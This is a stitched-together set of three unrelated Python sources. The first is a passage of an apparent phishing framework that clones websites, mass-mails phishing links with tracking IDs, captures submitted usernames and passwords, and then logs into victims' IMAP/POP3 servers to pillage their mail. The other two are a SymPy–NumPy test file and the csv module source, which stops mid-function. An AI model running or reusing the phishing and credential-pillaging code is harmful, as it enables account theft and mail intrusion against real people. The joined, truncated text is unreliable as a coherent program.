self.profile_dynamic_web_templates.sort()
# print list of dynamic templates
self.display.verbose("Collected [%s] dynamic web templates" % (len(self.profile_dynamic_web_templates)))
self.display.print_list("DYNAMIC TEMPLATE LIST",self.profile_dynamic_web_templates)
# sort/unique hostname list
self.profile_dynamic_web_templates = Utils.lowercase_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates = Utils.unique_list(self.profile_dynamic_web_templates)
self.profile_dynamic_web_templates.sort()
# for any dynamic sites, try to clone them
self.display.output("Cloning any DYNAMIC sites")
for template in self.profile_dynamic_web_templates:
sc = SiteCloner(clone_dir=self.outdir+"web_clones/")
tdir = sc.cloneUrl(template)
self.display.verbose("Cloning [%s] to [%s]" % (template, tdir))
self.db.addWebTemplate(ttype="dynamic", src_url=template, tdir=tdir)
# loop over all built in templates
for f in os.listdir(self.config["web_template_path"]):
template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG"
for line in open(template_file).readlines():
for tem in self.profile_valid_web_templates:
if re.match("^VHOST=\s*"+tem+"\s*$", line, re.IGNORECASE):
self.db.addWebTemplate(ttype="static", src_url="", tdir=os.path.join(self.config["web_template_path"], f))
break
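    # Illustrative sketch (assumed CONFIG format, based only on the regex above):
    # a built-in template whose CONFIG file contains a line such as
    #   VHOST=webmail
    # is registered as a "static" web template when "webmail" appears in
    # self.profile_valid_web_templates.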
#----------------------------
# Select Web Templates
#----------------------------
def select_web_templates(self):
templates = []
# get lists of current templates
db_static_templates = self.db.getWebTemplates(ttype="static")
db_dynamic_templates = self.db.getWebTemplates(ttype="dynamic")
# check to see if we have templates
if (db_static_templates or db_dynamic_templates):
for template in db_static_templates:
parts = template.split("[-]")
template_file = parts[0] + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("static", parts[0], parts[1]))
for template in db_dynamic_templates:
parts = template.split("[-]")
template_file = parts[0] + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("dynamic", parts[0], parts[1]))
else:
# assume we do not have any valid templates
# load all standard templates
for f in os.listdir(self.config["web_template_path"]):
template_file = os.path.join(self.config["web_template_path"], f) + "/CONFIG"
if Utils.is_readable(template_file) and os.path.isfile(template_file):
templates.append(("static", os.path.join(self.config["web_template_path"], f), ""))
print "FIXED = [%s]" % (os.path.join(self.config["web_template_path"], f))
# if "always yes" is enabled then just use all templates
if (not self.config["always_yes"]):
items = self.display.selectlist("Please select (comma separated) the item(s) you wish to use. : ", templates)
templates_temp = []
self.db.clearWebTemplates()
for item in items:
print templates[int(item)-1]
templates_temp.append(templates[int(item)-1])
self.db.addWebTemplate(ttype=templates[int(item)-1][0], src_url=templates[int(item)-1][2], tdir=templates[int(item)-1][1])
templates = templates_temp
# print list of enabled templates
self.display.print_list("TEMPLATE LIST", templates)
#----------------------------
# Load web sites
#----------------------------
def load_websites(self):
# are required flags set?
if self.config["enable_web"] == True:
self.select_web_templates()
print
self.display.output("Starting phishing webserver")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
path = os.path.dirname(os.path.realpath(__file__))
# Start process
cmd = [path + "/../web.py", Utils.compressDict(self.config)]
self.webserver = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE)
# monitor output to gather website information
while True:
line = self.webserver.stdout.readline()
line = line.strip()
if line == 'Websites loaded and launched.':
break
if line != '':
self.display.verbose(line)
match=re.search("Started website", line)
VHOST = ""
PORT = ""
if match:
parts=line.split("[")
VHOST=parts[1].split("]")
VHOST=VHOST[0].strip()
PORT=parts[2].split("]")
PORT=PORT[0].strip()
PORT=PORT[7:]
# keep the URL clean
# if port is 80, then it does not need to be included in the URL
if (PORT[-3:] == ":80"):
PORT = PORT[:-3]
self.config[VHOST + "_port"] = PORT
self.config[VHOST + "_vhost"] = VHOST
Utils.screenCaptureWebSite("http://" + PORT,
self.outdir + "screenshots/" + PORT + "_" + VHOST + ".png")
Utils.screenCaptureWebSite("http://" + VHOST + "." + self.config["phishing_domain"],
self.outdir + "screenshots/" + VHOST + "." + self.config["phishing_domain"] + ".png")
# Write PID file
pidfilename = os.path.join(self.pid_path, "spfwebsrv.pid")
pidfile = open(pidfilename, 'w')
pidfile.write(str(self.webserver.pid))
pidfile.close()
self.webserverpid = self.webserver.pid
self.display.verbose("Started WebServer with pid = [%s]" % self.webserver.pid)
#----------------------------
# Build array of email templates
#----------------------------
def load_email_templates(self):
# do we even have targets?
if (((self.email_list is not None)
and (self.email_list))
and ((self.config["enable_email_sending"] == True)
or (self.config["simulate_email_sending"] == True))):
print
self.display.verbose("Locating phishing email templates")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
# loop over each email template
for f in os.listdir("templates/email/"):
template_file = os.path.join("templates/email/", f)
self.display.debug("Found the following email template: [%s]" % template_file)
if ((Utils.is_readable(template_file)) and (os.path.isfile(template_file))):
# read in the template SUBJECT, TYPE, and BODY
TYPE = ""
SUBJECT = ""
BODY = ""
with open (template_file, "r") as myfile:
for line in myfile.readlines():
match=re.search("TYPE=", line)
if match:
TYPE=line.replace('"', "")
TYPE=TYPE.split("=")
TYPE=TYPE[1].lower().strip()
match2=re.search("SUBJECT=", line)
if match2:
SUBJECT=line.replace('"', "")
SUBJECT=SUBJECT.split("=")
SUBJECT=SUBJECT[1].strip()
match3=re.search("BODY=", line)
if match3:
BODY=line.replace('"', "")
BODY=BODY.replace(r'\n', "\n")
BODY=BODY.split("=")
BODY=BODY[1].strip()
self.email_templates[TYPE].append(EmailTemplate(TYPE, SUBJECT, BODY))
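    # Illustrative sketch of the email template format parsed above (values are
    # hypothetical; only the TYPE=/SUBJECT=/BODY= keys come from the code):
    #   TYPE="owa"
    #   SUBJECT="Scheduled webmail maintenance"
    #   BODY="Please re-validate your account at [[TARGET]] before Friday."
    # The [[TARGET]] placeholder is later replaced with the phishing URL in
    # send_emails().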
#----------------------------
# Generate/Send phishing emails
#----------------------------
def send_emails(self):
# are required flags set?
if ((self.config["enable_email_sending"] == True) or (self.config["simulate_email_sending"] == True)):
if ((self.config["determine_smtp"] == "1") and (self.config["use_specific_smtp"] == "1")):
self.display.error("ONLY 1 of DETERMINE_SMTP or USE_SPECIFIC_SMTP can be enabled at a time.")
else:
print
self.display.output("Sending phishing emails")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
templates_logged = []
# do we have any emails to send?
if self.email_list:
temp_target_list = self.email_list
temp_delay = 1
if (self.config["email_delay"] is not None):
temp_delay = int(self.config["email_delay"])
send_count = 0
# while there are still target email addresses, loop
while (temp_target_list and (send_count < (int(self.config["emails_max"])))):
# inc number of emails we have attempted to send
send_count = send_count + 1
# delay requested amount of time between sending emails
time.sleep(temp_delay)
# for each type of email (citrix, owa, office365, ...)
for key in self.email_templates:
# double check
if temp_target_list:
# for each email template of the given type
for template in self.email_templates[key]:
# double check
if temp_target_list:
# grab a new target email address
target = temp_target_list.pop(0)
self.display.verbose("Sending Email to [%s]" % target)
#FROM = "support@" + self.config["phishing_domain"]
FROM = self.config["smtp_fromaddr"]
SUBJECT = template.getSUBJECT()
BODY = template.getBODY()
# perform necessary SEARCH/REPLACE
if self.config["enable_host_based_vhosts"] == "1":
targetlink="http://" + key + "." + self.config["phishing_domain"]
if self.config["enable_user_tracking"] == "1":
targetlink += "?u=" + self.db.getUserTrackId(target)
BODY=BODY.replace(r'[[TARGET]]', targetlink)
else:
if (not key == "dynamic"):
targetlink="http://" + self.config[key+ "_port"]
if self.config["enable_user_tracking"] == "1":
targetlink += "?u=" + self.db.getUserTrackId(target)
BODY=BODY.replace(r'[[TARGET]]', targetlink)
# log
if (key not in templates_logged):
self.display.log("----------------------------------------------\n\n" +
"TO: <XXXXX>\n" +
"FROM: " + FROM + "\n" +
"SUBJECT: " + SUBJECT + "\n\n" +
BODY + "\n\n" +
"----------------------------------------------\n\n" +
"TARGETS:\n" +
"--------\n",
filename="email_template_" + key + ".txt")
templates_logged.append(key)
self.display.log(target + "\n", filename="email_template_" + key + ".txt")
# send the email
if (self.config["simulate_email_sending"] == True):
self.display.output("Would have sent an email to [%s] with subject of [%s], but this was just a test." % (target, SUBJECT))
else:
try:
if self.config["determine_smtp"] == "1":
emails.send_email_direct(target,
FROM,
self.config["smtp_displayname"],
SUBJECT,
BODY,
debug=True)
if self.config["use_specific_smtp"] == "1":
print self.config["smtp_fromaddr"]
emails.send_email_account(self.config["smtp_server"],
int(self.config["smtp_port"]),
self.config["smtp_user"],
self.config["smtp_pass"],
target,
self.config["smtp_fromaddr"],
self.config["smtp_displayname"],
SUBJECT,
BODY,
debug=True)
                                                except Exception:
                                                    self.display.error("Could not send email to " + target)
#----------------------------
# Monitor web sites
#----------------------------
def monitor_results(self):
# are required flags set?
if self.config["enable_web"] == True:
print
self.display.output("Monitoring phishing website activity!")
self.display.alert("(Press CTRL-C to stop collection and generate report!)")
if (self.webserver):
while True:
line = self.webserver.stdout.readline()
line = line.strip()
if (self.config["pillage_email"]):
self.pillage(line)
self.display.output(line)
#==================================================
# Secondary METHODS
#==================================================
#----------------------------
# Pillage Emails
#----------------------------
def pillage(self, line):
username = None
password = None
# parse line into username/password
usermatch = re.match(".*username=\['(.*?)'\].*", line)
if (usermatch):
username = usermatch.group(1)
passmatch = re.match(".*password=\['(.*?)'\].*", line)
if (passmatch):
password = passmatch.group(1)
# if no username or password, then return
if ((not username) or (not password)):
return
# is it a new username/password pair we have not seen before?
if (not username+":"+password in self.pillaged_users):
self.pillaged_users.append(username+":"+password)
# make a new MailPillager if one does not exist
if (not self.mp):
self.mp = MailPillager()
# attempt to determine the best Mail Server to use
if (not self.bestMailServer):
self.determineBestMailServer()
# if no Best Mail Server was identified, return
if (not self.bestMailServer):
self.display.error("No valid target IMAP/POP3 mail servers were identified.")
return
#print self.bestMailServer + ":" + str(self.bestMailServerPort)
# PILLAGE!!!
self.mp.pillage(username=username, password=password, server=self.bestMailServer,
port=self.bestMailServerPort, domain=self.config["domain_name"], outputdir=self.outdir + "pillage_data/")
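    # Illustrative web-server output line (credentials invented) that the
    # regexes in pillage() would parse into username "jdoe" and password
    # "Spring2015":
    #   "POST /login ... username=['jdoe'] password=['Spring2015'] ..."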
#----------------------------
# See which Mail Server we should use
#
# TODO: needs to be updated!!!
#----------------------------
def determineBestMailServer(self):
if self.server_list[993]: # IMAPS
self.bestMailServerPort = 993
self.bestMailServer = self.server_list[993][0]
elif self.server_list[143]: #IMAP
self.bestMailServerPort = 143
self.bestMailServer = self.server_list[143][0]
elif self.server_list[995]: # POP3S
self.bestMailServerPort = 995
self.bestMailServer = self.server_list[995][0]
elif self.server_list[110]: # POP3
self.bestMailServerPort = 110
self.bestMailServer = self.server_list[110][0]
#==========================================================================================
#==========================================================================================
#==========================================================================================
#----------------------------
# Primary METHOD
#----------------------------
def run(self, argv):
# load config
self.parse_parameters(argv)
self.load_config()
# make directories
if not os.path.isdir(self.outdir + "reports/"):
os.makedirs(self.outdir + "reports/")
if not os.path.isdir(self.outdir + "logs/"):
os.makedirs(self.outdir + "logs/")
if not os.path.isdir(self.outdir + "screenshots/"):
os.makedirs(self.outdir + "screenshots/")
if not os.path.isdir(self.outdir + "web_clones/"):
os.makedirs(self.outdir + "web_clones/")
if not os.path.isdir(self.outdir + "pillage_data/"):
os.makedirs(self.outdir + "pillage_data/")
# dns/portscan/cloning
self.gather_dns()
self.port_scan()
self.profile_site()
# load websites
self.load_websites()
# do email stuff
self.prep_email()
self.load_email_templates()
self.send_emails()
# sit back and listen
self.monitor_results()
|
|
# This testfile tests SymPy <-> NumPy compatibility
# Don't test any SymPy features here. Just pure interaction with NumPy.
# Always write regular SymPy tests for anything that can be tested in pure
# Python (without numpy). Here we test everything that a user may need when
# using SymPy with NumPy
try:
from numpy import array, matrix, ndarray
import numpy
except ImportError:
#py.test will not execute any tests now
disabled = True
from sympy import (Rational, Symbol, list2numpy, sin, Real, Matrix, lambdify,
symarray, symbols)
import sympy
from sympy import mpmath
mpmath.mp.dps = 16
sin02 = mpmath.mpf("0.198669330795061215459412627")
# first, systematically check that all operations are implemented and don't
# raise an exception
def test_systematic_basic():
def s(sympy_object, numpy_array):
x = sympy_object + numpy_array
x = numpy_array + sympy_object
x = sympy_object - numpy_array
x = numpy_array - sympy_object
x = sympy_object * numpy_array
x = numpy_array * sympy_object
x = sympy_object / numpy_array
x = numpy_array / sympy_object
x = sympy_object ** numpy_array
x = numpy_array ** sympy_object
x = Symbol("x")
y = Symbol("y")
sympy_objs = [
Rational(2),
Real("1.3"),
x,
y,
pow(x,y)*y,
5,
5.5,
]
numpy_objs = [
array([1]),
array([3, 8, -1]),
array([x, x**2, Rational(5)]),
array([x/y*sin(y), 5, Rational(5)]),
]
for x in sympy_objs:
for y in numpy_objs:
s(x,y)
# now some random tests that test particular problems and that also
# check that the results of the operations are correct
def test_basics():
one = Rational(1)
zero = Rational(0)
x = Symbol("x")
assert array(1) == array(one)
assert array([one]) == array([one])
assert array([x]) == array([x])
assert array(x) == array(Symbol("x"))
assert array(one+x) == array(1+x)
X = array([one, zero, zero])
assert (X == array([one, zero, zero])).all()
assert (X == array([one, 0, 0])).all()
def test_arrays():
one = Rational(1)
zero = Rational(0)
X = array([one, zero, zero])
Y = one*X
X = array([Symbol("a")+Rational(1,2)])
Y = X+X
assert Y == array([1+2*Symbol("a")])
Y = Y + 1
assert Y == array([2+2*Symbol("a")])
Y = X-X
assert Y == array([0])
def test_conversion1():
x = Symbol("x")
a = list2numpy([x**2, x])
#looks like an array?
assert isinstance(a, ndarray)
assert a[0] == x**2
assert a[1] == x
assert len(a) == 2
#yes, it's the array
def test_conversion2():
x = Symbol("x")
a = 2*list2numpy([x**2, x])
b = list2numpy([2*x**2, 2*x])
assert (a == b).all()
one = Rational(1)
zero = Rational(0)
X = list2numpy([one, zero, zero])
Y = one*X
X = list2numpy([Symbol("a")+Rational(1,2)])
Y = X+X
assert Y == array([1+2*Symbol("a")])
Y = Y + 1
assert Y == array([2+2*Symbol("a")])
Y = X-X
assert Y == array([0])
def test_list2numpy():
x = Symbol("x")
assert (array([x**2, x]) == list2numpy([x**2, x])).all()
def test_Matrix1():
x = Symbol("x")
m = Matrix([[x, x**2], [5, 2/x]])
assert (array(m.subs(x, 2)) == array([[2, 4],[5, 1]])).all()
m = Matrix([[sin(x), x**2], [5, 2/x]])
assert (array(m.subs(x, 2)) == array([[sin(2), 4],[5, 1]])).all()
def test_Matrix2():
x = Symbol("x")
m = Matrix([[x, x**2], [5, 2/x]])
assert (matrix(m.subs(x, 2)) == matrix([[2, 4],[5, 1]])).all()
m = Matrix([[sin(x), x**2], [5, 2/x]])
assert (matrix(m.subs(x, 2)) == matrix([[sin(2), 4],[5, 1]])).all()
def test_Matrix3():
x = Symbol("x")
a = array([[2, 4],[5, 1]])
assert Matrix(a) == Matrix([[2, 4], [5, 1]])
assert Matrix(a) != Matrix([[2, 4], [5, 2]])
a = array([[sin(2), 4], [5, 1]])
assert Matrix(a) == Matrix([[sin(2), 4],[5, 1]])
assert Matrix(a) != Matrix([[sin(0), 4],[5, 1]])
def test_Matrix4():
x = Symbol("x")
a = matrix([[2, 4],[5, 1]])
assert Matrix(a) == Matrix([[2, 4], [5, 1]])
assert Matrix(a) != Matrix([[2, 4], [5, 2]])
a = matrix([[sin(2), 4], [5, 1]])
assert Matrix(a) == Matrix([[sin(2), 4],[5, 1]])
assert Matrix(a) != Matrix([[sin(0), 4],[5, 1]])
def test_Matrix_sum():
x, y, z = Symbol('x'), Symbol('y'), Symbol('z')
M = Matrix([[1,2,3],[x,y,x],[2*y,-50,z*x]])
m = matrix([[2,3,4],[x,5,6],[x,y,z**2]])
assert M+m == Matrix([[3,5,7],[2*x,y+5,x+6],[2*y+x,y-50,z*x+z**2]])
assert m+M == Matrix([[3,5,7],[2*x,y+5,x+6],[2*y+x,y-50,z*x+z**2]])
assert M+m == M.add(m)
def test_Matrix_mul():
x, y, z = Symbol('x'), Symbol('y'), Symbol('z')
M = Matrix([[1,2,3],[x,y,x]])
m = matrix([[2,4],[x,6],[x,z**2]])
assert M*m == Matrix([
[ 2 + 5*x, 16 + 3*z**2],
[2*x + x*y + x**2, 4*x + 6*y + x*z**2],
])
assert m*M == Matrix([
[ 2 + 4*x, 4 + 4*y, 6 + 4*x],
[ 7*x, 2*x + 6*y, 9*x],
[x + x*z**2, 2*x + y*z**2, 3*x + x*z**2],
])
a = array([2])
assert a[0] * M == 2 * M
assert M * a[0] == 2 * M
def test_Matrix_array():
class matarray(object):
def __array__(self):
from numpy import array
return array([[1,2,3],[4,5,6],[7,8,9]])
matarr = matarray()
assert Matrix(matarr) == Matrix([[1,2,3],[4,5,6],[7,8,9]])
def test_issue629():
x = Symbol("x")
assert (Rational(1,2)*array([2*x, 0]) == array([x, 0])).all()
assert (Rational(1,2)+array([2*x, 0]) == array([2*x+Rational(1,2), Rational(1,2)])).all()
assert (Real("0.5")*array([2*x, 0]) == array([Real("1.0")*x, 0])).all()
assert (Real("0.5")+array([2*x, 0]) == array([2*x+Real("0.5"), Real("0.5")])).all()
def test_lambdify():
x = Symbol("x")
f = lambdify(x, sin(x), "numpy")
prec = 1e-15
assert -prec < f(0.2) - sin02 < prec
try:
f(x) # if this succeeds, it can't be a numpy function
assert False
except AttributeError:
pass
def test_lambdify_matrix():
x = Symbol("x")
f = lambdify(x, Matrix([[x, 2*x],[1, 2]]), "numpy")
assert (f(1) == matrix([[1,2],[1,2]])).all()
def test_lambdify_matrix_multi_input():
x,y,z = symbols('x,y,z')
M=sympy.Matrix([[x**2, x*y, x*z],
[y*x, y**2, y*z],
[z*x, z*y, z**2]])
f = lambdify((x,y,z), M, "numpy")
xh,yh,zh = 1.0, 2.0, 3.0
expected = matrix([[xh**2, xh*yh, xh*zh],
[yh*xh, yh**2, yh*zh],
[zh*xh, zh*yh, zh**2]])
actual = f(xh,yh,zh)
assert numpy.allclose(actual,expected)
def test_lambdify_matrix_vec_input():
X=sympy.DeferredVector('X')
M=Matrix([[X[0]**2, X[0]*X[1], X[0]*X[2]],
[X[1]*X[0], X[1]**2, X[1]*X[2]],
[X[2]*X[0], X[2]*X[1], X[2]**2]])
f = lambdify(X, M, "numpy")
Xh = array([1.0, 2.0, 3.0])
expected = matrix([[Xh[0]**2, Xh[0]*Xh[1], Xh[0]*Xh[2]],
[Xh[1]*Xh[0], Xh[1]**2, Xh[1]*Xh[2]],
[Xh[2]*Xh[0], Xh[2]*Xh[1], Xh[2]**2]])
actual = f(Xh)
assert numpy.allclose(actual,expected)
def test_lambdify_transl():
from sympy.utilities.lambdify import NUMPY_TRANSLATIONS
for sym, mat in NUMPY_TRANSLATIONS.iteritems():
assert sym in sympy.__dict__
assert mat in numpy.__dict__
def test_symarray():
"""Test creation of numpy arrays of sympy symbols."""
import numpy as np
import numpy.testing as npt
syms = symbols('_0,_1,_2')
s1 = symarray("", 3)
s2 = symarray("", 3)
npt.assert_array_equal (s1, np.array(syms, dtype=object))
assert s1[0] is s2[0]
a = symarray('a', 3)
b = symarray('b', 3)
assert not(a[0] is b[0])
asyms = symbols('a_0,a_1,a_2')
npt.assert_array_equal (a, np.array(asyms, dtype=object))
# Multidimensional checks
a2d = symarray('a', (2,3))
assert a2d.shape == (2,3)
a00, a12 = symbols('a_0_0,a_1_2')
assert a2d[0,0] is a00
assert a2d[1,2] is a12
a3d = symarray('a', (2,3,2))
assert a3d.shape == (2,3,2)
a000, a120, a121 = symbols('a_0_0_0,a_1_2_0,a_1_2_1')
assert a3d[0,0,0] is a000
assert a3d[1,2,0] is a120
assert a3d[1,2,1] is a121
|
|
"""
csv.py - read/write/investigate CSV files
"""
import re
from _csv import Error, __version__, writer, reader, register_dialect, \
unregister_dialect, get_dialect, list_dialects, \
field_size_limit, \
QUOTE_MINIMAL, QUOTE_ALL, QUOTE_NONNUMERIC, QUOTE_NONE, \
__doc__
from _csv import Dialect as _Dialect
from io import StringIO
__all__ = [ "QUOTE_MINIMAL", "QUOTE_ALL", "QUOTE_NONNUMERIC", "QUOTE_NONE",
"Error", "Dialect", "__doc__", "excel", "excel_tab",
"field_size_limit", "reader", "writer",
"register_dialect", "get_dialect", "list_dialects", "Sniffer",
"unregister_dialect", "__version__", "DictReader", "DictWriter" ]
class Dialect:
"""Describe a CSV dialect.
This must be subclassed (see csv.excel). Valid attributes are:
delimiter, quotechar, escapechar, doublequote, skipinitialspace,
lineterminator, quoting.
"""
_name = ""
_valid = False
# placeholders
delimiter = None
quotechar = None
escapechar = None
doublequote = None
skipinitialspace = None
lineterminator = None
quoting = None
def __init__(self):
if self.__class__ != Dialect:
self._valid = True
self._validate()
def _validate(self):
try:
_Dialect(self)
except TypeError as e:
# We do this for compatibility with py2.3
raise Error(str(e))
class excel(Dialect):
"""Describe the usual properties of Excel-generated CSV files."""
delimiter = ','
quotechar = '"'
doublequote = True
skipinitialspace = False
lineterminator = '\r\n'
quoting = QUOTE_MINIMAL
register_dialect("excel", excel)
class excel_tab(excel):
"""Describe the usual properties of Excel-generated TAB-delimited files."""
delimiter = '\t'
register_dialect("excel-tab", excel_tab)
class unix_dialect(Dialect):
"""Describe the usual properties of Unix-generated CSV files."""
delimiter = ','
quotechar = '"'
doublequote = True
skipinitialspace = False
lineterminator = '\n'
quoting = QUOTE_ALL
register_dialect("unix", unix_dialect)
class DictReader:
def __init__(self, f, fieldnames=None, restkey=None, restval=None,
dialect="excel", *args, **kwds):
self._fieldnames = fieldnames # list of keys for the dict
self.restkey = restkey # key to catch long rows
self.restval = restval # default value for short rows
self.reader = reader(f, dialect, *args, **kwds)
self.dialect = dialect
self.line_num = 0
def __iter__(self):
return self
@property
def fieldnames(self):
if self._fieldnames is None:
try:
self._fieldnames = next(self.reader)
except StopIteration:
pass
self.line_num = self.reader.line_num
return self._fieldnames
@fieldnames.setter
def fieldnames(self, value):
self._fieldnames = value
def __next__(self):
if self.line_num == 0:
# Used only for its side effect.
self.fieldnames
row = next(self.reader)
self.line_num = self.reader.line_num
# unlike the basic reader, we prefer not to return blanks,
# because we will typically wind up with a dict full of None
# values
while row == []:
row = next(self.reader)
d = dict(zip(self.fieldnames, row))
lf = len(self.fieldnames)
lr = len(row)
if lf < lr:
d[self.restkey] = row[lf:]
elif lf > lr:
for key in self.fieldnames[lr:]:
d[key] = self.restval
return d
class DictWriter:
def __init__(self, f, fieldnames, restval="", extrasaction="raise",
dialect="excel", *args, **kwds):
self.fieldnames = fieldnames # list of keys for the dict
self.restval = restval # for writing short dicts
if extrasaction.lower() not in ("raise", "ignore"):
raise ValueError("extrasaction (%s) must be 'raise' or 'ignore'"
% extrasaction)
self.extrasaction = extrasaction
self.writer = writer(f, dialect, *args, **kwds)
def writeheader(self):
header = dict(zip(self.fieldnames, self.fieldnames))
self.writerow(header)
def _dict_to_list(self, rowdict):
if self.extrasaction == "raise":
wrong_fields = [k for k in rowdict if k not in self.fieldnames]
if wrong_fields:
raise ValueError("dict contains fields not in fieldnames: "
+ ", ".join(wrong_fields))
return [rowdict.get(key, self.restval) for key in self.fieldnames]
def writerow(self, rowdict):
return self.writer.writerow(self._dict_to_list(rowdict))
def writerows(self, rowdicts):
rows = []
for rowdict in rowdicts:
rows.append(self._dict_to_list(rowdict))
return self.writer.writerows(rows)
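# A minimal usage sketch; the helper name below is ours and not part of this
# module's API. It round-trips one row through DictWriter and DictReader via
# an in-memory StringIO buffer (already imported above).
def _example_dict_round_trip():
    buf = StringIO()
    w = DictWriter(buf, fieldnames=["name", "age"])
    w.writeheader()
    w.writerow({"name": "alice", "age": 30})
    buf.seek(0)
    # Values come back as strings, e.g. [{'name': 'alice', 'age': '30'}]
    return list(DictReader(buf))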
# Guard Sniffer's type checking against builds that exclude complex()
try:
complex
except NameError:
complex = float
class Sniffer:
'''
"Sniffs" the format of a CSV file (i.e. delimiter, quotechar)
Returns a Dialect object.
'''
def __init__(self):
# in case there is more than one possible delimiter
self.preferred = [',', '\t', ';', ' ', ':']
def sniff(self, sample, delimiters=None):
"""
Returns a dialect (or None) corresponding to the sample
"""
quotechar, doublequote, delimiter, skipinitialspace = \
self._guess_quote_and_delimiter(sample, delimiters)
if not delimiter:
delimiter, skipinitialspace = self._guess_delimiter(sample,
delimiters)
if not delimiter:
raise Error("Could not determine delimiter")
class dialect(Dialect):
_name = "sniffed"
lineterminator = '\r\n'
quoting = QUOTE_MINIMAL
# escapechar = ''
dialect.doublequote = doublequote
dialect.delimiter = delimiter
# _csv.reader won't accept a quotechar of ''
dialect.quotechar = quotechar or '"'
dialect.skipinitialspace = skipinitialspace
return dialect
def _guess_quote_and_delimiter(self, data, delimiters):
"""
Looks for text enclosed between two identical quotes
(the probable quotechar) which are preceded and followed
by the same character (the probable delimiter).
For example:
,'some text',
The quote with the most wins, same with the delimiter.
If there is no quotechar the delimiter can't be determined
this way.
"""
matches = []
for restr in ('(?P<delim>[^\w\n"\'])(?P<space> ?)(?P<quote>["\']).*?(?P=quote)(?P=delim)', # ,".*?",
'(?:^|\n)(?P<quote>["\']).*?(?P=quote)(?P<delim>[^\w\n"\'])(?P<space> ?)', # ".*?",
                      '(?P<delim>[^\w\n"\'])(?P<space> ?)(?P<quote>["\']).*?(?P=quote)(?:$|\n)',   # ,".*?"
'(?:^|\n)(?P<quote>["\']).*?(?P=quote)(?:$|\n)'): # ".*?" (no delim, no space)
regexp = re.compile(restr, re.DOTALL | re.MULTILINE)
matches = regexp.findall(data)
if matches:
break
if not matches:
# (quotechar, doublequote, delimiter, skipinitialspace)
return ('', False, None, 0)
quotes = {}
delims = {}
spaces = 0
for m in matches:
n = regexp.groupindex['quote'] - 1
key = m[n]
if key:
quotes[key] = quotes.get(key, 0) + 1
try:
n = regexp.groupindex['delim'] - 1
key = m[n]
except KeyError:
continue
if key and (delimiters is None or key in delimiters):
delims[key] = delims.get(key, 0) + 1
try:
n = regexp.groupindex['space'] - 1
except KeyError:
continue
if m[n]:
spaces += 1
quotechar = max(quotes, key=quotes.get)
if delims:
delim = max(delims, key=delims.get)
skipinitialspace = delims[delim] == spaces
if delim == '\n': # most likely a file with a single column
delim = ''
else:
# there is *no* delimiter, it's a single column of quoted data
delim = ''
skipinitialspace = 0
# if we see an extra quote between delimiters, we've got a
# double quoted format
dq_regexp = re.compile(r"((%(delim)s)|^)\W*%(quote)s[^%(delim)s\n]*%(quote)s[^%(delim)s\n]*%(quote)s\W*((%(delim)s)|$)" % \
{'delim':delim, 'quote':quotechar}, re.MULTILINE)
if dq_regexp.search(data):
doublequote = True
else:
doublequote = False
return (quotechar, doublequote, delim, skipinitialspace)
def _guess_delimiter(self, data, delimiters):
"""
The delimiter /should/ occur the same number of times on
each row. However, due to malformed data, it may not. We don't want
an all or nothing approach, so we allow for small variations in this
number.
1) build a table of the frequency of each character on every line.
        2) build a table of frequencies of this frequency (meta-frequency?),
e.g. 'x occurred 5 times in 10 rows, 6 times in 1000 rows,
7 times in 2 rows'
3) use the mode of the meta-frequency to determine the /expected/
frequency for that character
4) find out how often the character actually meets that goal
5) the character that best meets its goal is the delimiter
For performance reasons, the data is evaluated in chunks, so it can
try and evaluate the smallest portion of the data possible, evaluating
additional chunks as necessary.
"""
data = list(filter(None, data.split('\n')))
ascii = [chr(c) for c in range(127)] # 7-bit ASCII
# build frequency tables
chunkLength = min(10, len(data))
iteration = 0
charFrequency = {}
modes = {}
delims = {}
start, end = 0, min(chunkLength, len(data))
while start < len(data):
iteration += 1
for line in data[start:end]:
for char in ascii:
metaFrequency = charFrequency.get(char, {})
# must count even if frequency is 0
freq = line.count(char)
# value is the mode
metaFrequency[freq] = metaFrequency.get(freq, 0) + 1
charFrequency[char] = metaFrequency
for char in charFrequency.keys():
items = list(charFrequency[char].items())
if len(items) == 1 and items[0][0] == 0:
continue
# get the mode of the frequencies
if len(items) > 1:
modes[char] = max(items, key=lambda x: x[1])
# adjust the mode - subtract the sum of all
# other frequencies
items.remove(modes[char])
modes[char] = (modes[char][0], modes[char][1]
- sum(item[1] for item in items))
else:
modes[char] = items[0]
# build a list of possible delimiters
modeList = modes.items()
total = float(chunkLength * iteration)
# (rows of consistent data) / (number of rows) = 100%
consistency = 1.0
# minimum consistency threshold
threshold = 0.9
while len(delims) == 0 and consistency >= threshold:
for k, v in modeList:
if v[0] > 0 and v[1] > 0:
if ((v[1]/total) >= consistency and
(delimiters is None or k in delimiters)):
delims[k] = v
consistency -= 0.01
if len(delims) == 1:
delim = list(delims.keys())[0]
skipinitialspace = (data[0].count(delim) ==
data[0].count("%c " % delim))
return (delim, skipinitialspace)
# analyze another chunkLength lines
start = end
end += chunkLength
if not delims:
return ('', 0)
# if there's more than one, fall back to a 'preferred' list
if len(delims) > 1:
for d in self.preferred:
if d in delims.keys():
skipinitialspace = (data[0].count(d) ==
data[0].count("%c " % d))
return (d, skipinitialspace)
# nothing else indicates a preference, pick the character that
# dominates(?)
items = [(v,k) for (k,v) in delims.items()]
items.sort()
delim = items[-1][1]
skipinitialspace = (data[0].count(delim) ==
data[0].count("%c " % delim))
return (delim, skipinitialspace)
def has_header(self, sample):
# Creates a dictionary of types of data in each column. If any
# column is of a single type (say, integers), *except* for the first
# row, then the first row is presumed to be labels. If the type
# can't be determined, it is assumed to be a string in which case
# the length of the string is the determining factor: if all of the
# rows except for the first are the same length, it's a header.
# Finally, a 'vote' is taken at the end for each column, adding or
# subtracting from the likelihood of the first row being a header.
rdr = reader(StringIO(sample), self.sniff(sample))
header = next(rdr) # assume first row is header
columns = len(header)
columnTypes = {}
for i in range(columns): columnTypes[i] = None
checked = 0
for row in rdr:
# arbitrary number of rows to check, to keep it sane
if checked > 20:
break
checked += 1
if len(row) != columns:
continue # skip rows that have irregular number of columns
for col in list(columnTypes.keys()):
for thisType in [int, float, complex]:
try:
thisType(row[col])
break
except (ValueError, OverflowError):
pass
else:
